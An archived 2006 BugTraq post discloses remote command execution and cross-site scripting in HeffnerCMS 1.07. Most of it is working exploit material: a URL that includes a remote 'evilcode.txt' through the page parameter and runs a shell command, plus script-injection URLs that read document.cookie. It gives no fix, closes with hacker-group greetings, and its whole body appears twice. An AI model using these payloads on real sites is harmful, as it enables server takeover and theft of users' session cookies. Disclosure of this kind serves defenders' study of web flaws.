BugTraq
Back to list
|
Post reply
HeffnerCMS Remote Command Exucetion And Cross Scripting Attack
Mar 24 2006 05:47PM
botan linuxmail org
Website : http://www.christian-heffner.de
Version : 1.07
I.
<?php
$filename="index.php";
require_once 'vlib/vlibTemplate.php';
$tmpl = new vlibTemplate('tmpl/std/index.tpl');
require_once 'config/db_config.php';
require_once 'config/pcfunctions.php';
Ucuyor.... :) lol
II. Vulnerable code ;
http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a
III. Cross Scripting Attack
http://www.site.com/index.php?page=<script>alert(document.cookie)</scrip
t>
http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>
Etc..
IV. Solution
No
Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends..
irc.gigachat.net #kurdhack
www.PatrioticHackers
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Version : 1.07
I.
<?php
$filename="index.php";
require_once 'vlib/vlibTemplate.php';
$tmpl = new vlibTemplate('tmpl/std/index.tpl');
require_once 'config/db_config.php';
require_once 'config/pcfunctions.php';
Ucuyor.... :) lol
II. Vulnerable code ;
http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a
III. Cross Scripting Attack
http://www.site.com/index.php?page=<script>alert(document.cookie)</scrip
t>
http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>
Etc..
IV. Solution
No
Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends..
irc.gigachat.net #kurdhack
www.PatrioticHackers
[ reply ]